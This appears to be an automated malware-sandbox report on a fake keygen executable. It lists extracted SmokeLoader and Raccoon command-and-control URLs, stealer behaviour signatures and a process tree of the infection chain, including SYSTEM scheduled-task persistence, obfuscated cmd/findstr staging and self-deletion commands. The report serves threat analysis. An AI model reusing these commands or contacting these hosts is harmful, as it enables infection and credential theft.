Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1800s
  • max time network
    1725s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 58 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 32 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 40 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:876
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1348
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {5AB6ABD8-1CD1-4FF8-9F4E-A5C6E043D172} S-1-5-18:NT AUTHORITY\System:Service:
            3⤵
              PID:2108
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                4⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                PID:2040
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                4⤵
                • Executes dropped EXE
                PID:3104
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                4⤵
                • Executes dropped EXE
                PID:3276
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                4⤵
                • Executes dropped EXE
                PID:4888
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                4⤵
                • Executes dropped EXE
                PID:5760
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                4⤵
                • Executes dropped EXE
                PID:6552
              • C:\Windows\system32\rundll32.exe
                C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\IWrYHEyJ\IWrYHEyJ.dll",IWrYHEyJ
                4⤵
                • Windows security modification
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:7924
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {BE645B2F-7C54-41B3-86D0-AB21E453D11F} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:7944
                • C:\Users\Admin\AppData\Roaming\ubhwugs
                  C:\Users\Admin\AppData\Roaming\ubhwugs
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:8184
                  • C:\Users\Admin\AppData\Roaming\ubhwugs
                    C:\Users\Admin\AppData\Roaming\ubhwugs
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:8020
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {4470B9EA-B5BB-4B5A-BD47-E2E157611D28} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                3⤵
                  PID:1212
                  • C:\Users\Admin\AppData\Roaming\ubhwugs
                    C:\Users\Admin\AppData\Roaming\ubhwugs
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:7968
                    • C:\Users\Admin\AppData\Roaming\ubhwugs
                      C:\Users\Admin\AppData\Roaming\ubhwugs
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:7512
                • C:\Windows\system32\taskeng.exe
                  taskeng.exe {D5F72846-87EC-4CDE-9CB6-B1519BC7CEE2} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                  3⤵
                    PID:8060
                    • C:\Users\Admin\AppData\Roaming\ubhwugs
                      C:\Users\Admin\AppData\Roaming\ubhwugs
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:7672
                      • C:\Users\Admin\AppData\Roaming\ubhwugs
                        C:\Users\Admin\AppData\Roaming\ubhwugs
                        5⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:8012
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:396
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Drops file in System32 directory
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:1756
                • C:\Windows\system32\msiexec.exe
                  C:\Windows\system32\msiexec.exe /V
                  2⤵
                  • Enumerates connected drives
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:2988
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding D003A38586FD3CADD0DFDBDE2986FC2E C
                    3⤵
                    • Loads dropped DLL
                    PID:2428
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding F35EDBD00EC496BBD0C90FDC71E051BA
                    3⤵
                      PID:2160
                      • C:\Windows\SysWOW64\taskkill.exe
                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                        4⤵
                        • Kills process with taskkill
                        PID:2752
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding 312738A4F549D91274ED81AA17428C9F M Global\MSI0000
                      3⤵
                        PID:2620
                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                    1⤵
                    • Loads dropped DLL
                    • Checks whether UAC is enabled
                    • Suspicious use of WriteProcessMemory
                    PID:1904
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1028
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        3⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1756
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1796
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1940
                      • C:\Users\Admin\AppData\Local\Temp\is-1EMR8.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-1EMR8.tmp\Install.tmp" /SL5="$30182,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1208
                        • C:\Users\Admin\AppData\Local\Temp\is-3VJK0.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-3VJK0.tmp\Ultra.exe" /S /UID=burnerch1
                          4⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Modifies system certificate store
                          • Suspicious use of WriteProcessMemory
                          PID:1260
                          • C:\Program Files\Common Files\SDSVTFEAPM\ultramediaburner.exe
                            "C:\Program Files\Common Files\SDSVTFEAPM\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1728
                            • C:\Users\Admin\AppData\Local\Temp\is-C5DG9.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-C5DG9.tmp\ultramediaburner.tmp" /SL5="$2018A,281924,62464,C:\Program Files\Common Files\SDSVTFEAPM\ultramediaburner.exe" /VERYSILENT
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              PID:324
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                7⤵
                                • Executes dropped EXE
                                PID:644
                          • C:\Users\Admin\AppData\Local\Temp\e7-65443-37b-fe49e-8aed2e7bbcb17\ZHibitolugy.exe
                            "C:\Users\Admin\AppData\Local\Temp\e7-65443-37b-fe49e-8aed2e7bbcb17\ZHibitolugy.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:1748
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                              6⤵
                              • Modifies Internet Explorer settings
                              • Suspicious behavior: GetForegroundWindowSpam
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              PID:1940
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:275457 /prefetch:2
                                7⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:1600
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:406530 /prefetch:2
                                7⤵
                                • Modifies Internet Explorer settings
                                • NTFS ADS
                                • Suspicious use of SetWindowsHookEx
                                PID:2284
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:668685 /prefetch:2
                                7⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:7636
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                              6⤵
                                PID:1780
                            • C:\Users\Admin\AppData\Local\Temp\4a-93923-5c1-04f87-3d07c5c3a3c94\SHodirifaja.exe
                              "C:\Users\Admin\AppData\Local\Temp\4a-93923-5c1-04f87-3d07c5c3a3c94\SHodirifaja.exe"
                              5⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              • Suspicious behavior: EnumeratesProcesses
                              PID:340
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dgqcxcta.q04\KiffMainE1.exe & exit
                                6⤵
                                  PID:2612
                                  • C:\Users\Admin\AppData\Local\Temp\dgqcxcta.q04\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\dgqcxcta.q04\KiffMainE1.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2848
                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                      dw20.exe -x -s 532
                                      8⤵
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      PID:3012
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ep5iib1f.taf\001.exe & exit
                                  6⤵
                                    PID:2892
                                    • C:\Users\Admin\AppData\Local\Temp\ep5iib1f.taf\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\ep5iib1f.taf\001.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:2924
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppr0kjw5.bzm\installer.exe /qn CAMPAIGN="654" & exit
                                    6⤵
                                      PID:1364
                                      • C:\Users\Admin\AppData\Local\Temp\ppr0kjw5.bzm\installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\ppr0kjw5.bzm\installer.exe /qn CAMPAIGN="654"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of FindShellTrayWindow
                                        PID:2476
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ppr0kjw5.bzm\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ppr0kjw5.bzm\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620031241 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                          8⤵
                                            PID:1360
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bouznumi.qzl\gpooe.exe & exit
                                        6⤵
                                          PID:2204
                                          • C:\Users\Admin\AppData\Local\Temp\bouznumi.qzl\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\bouznumi.qzl\gpooe.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2648
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:2792
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                  PID:2240
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:7792
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:7896
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cjcwbm5w.zd2\google-game.exe & exit
                                              6⤵
                                                PID:2584
                                                • C:\Users\Admin\AppData\Local\Temp\cjcwbm5w.zd2\google-game.exe
                                                  C:\Users\Admin\AppData\Local\Temp\cjcwbm5w.zd2\google-game.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2504
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                    8⤵
                                                    • Loads dropped DLL
                                                    • Modifies registry class
                                                    PID:2652
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\drwxmmuf.00a\askinstall39.exe & exit
                                                6⤵
                                                  PID:2232
                                                  • C:\Users\Admin\AppData\Local\Temp\drwxmmuf.00a\askinstall39.exe
                                                    C:\Users\Admin\AppData\Local\Temp\drwxmmuf.00a\askinstall39.exe
                                                    7⤵
                                                      PID:2820
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                        8⤵
                                                          PID:1936
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im chrome.exe
                                                            9⤵
                                                            • Kills process with taskkill
                                                            PID:2212
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ljdhd4ct.cgz\setup.exe & exit
                                                      6⤵
                                                        PID:2520
                                                        • C:\Users\Admin\AppData\Local\Temp\ljdhd4ct.cgz\setup.exe
                                                          C:\Users\Admin\AppData\Local\Temp\ljdhd4ct.cgz\setup.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:2816
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ljdhd4ct.cgz\setup.exe"
                                                            8⤵
                                                              PID:2732
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                9⤵
                                                                • Executes dropped EXE
                                                                • Runs ping.exe
                                                                PID:2240
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ra0ov3fr.3d2\Setup_v3.exe & exit
                                                          6⤵
                                                            PID:2884
                                                            • C:\Users\Admin\AppData\Local\Temp\ra0ov3fr.3d2\Setup_v3.exe
                                                              C:\Users\Admin\AppData\Local\Temp\ra0ov3fr.3d2\Setup_v3.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                              PID:1812
                                                              • C:\Windows\SysWOW64\at.exe
                                                                "C:\Windows\System32\at.exe"
                                                                8⤵
                                                                  PID:2732
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                  8⤵
                                                                    PID:2212
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\System32\cmd.exe
                                                                      9⤵
                                                                        PID:536
                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                          findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          PID:2480
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                          Fessura.exe.com Z
                                                                          10⤵
                                                                            PID:1248
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                              11⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2200
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                12⤵
                                                                                • Executes dropped EXE
                                                                                • Creates scheduled task(s)
                                                                                PID:1248
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                12⤵
                                                                                • Executes dropped EXE
                                                                                PID:7424
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            10⤵
                                                                            • Runs ping.exe
                                                                            PID:2828
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                        8⤵
                                                                          PID:2748
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgpt1kpy.tbk\toolspab1.exe & exit
                                                                      6⤵
                                                                        PID:2796
                                                                        • C:\Users\Admin\AppData\Local\Temp\mgpt1kpy.tbk\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\mgpt1kpy.tbk\toolspab1.exe
                                                                          7⤵
                                                                            PID:2480
                                                                            • C:\Users\Admin\AppData\Local\Temp\mgpt1kpy.tbk\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\mgpt1kpy.tbk\toolspab1.exe
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2580
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wdmlfsh1.q3n\005.exe & exit
                                                                          6⤵
                                                                            PID:2156
                                                                            • C:\Users\Admin\AppData\Local\Temp\wdmlfsh1.q3n\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\wdmlfsh1.q3n\005.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:2984
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eihwdyfy.zjw\SunLabsPlayer.exe /S & exit
                                                                            6⤵
                                                                              PID:1568
                                                                              • C:\Users\Admin\AppData\Local\Temp\eihwdyfy.zjw\SunLabsPlayer.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\eihwdyfy.zjw\SunLabsPlayer.exe /S
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                PID:2448
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:1276
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:1976
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:652
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd848D.tmp\tempfile.ps1"
                                                                                        8⤵
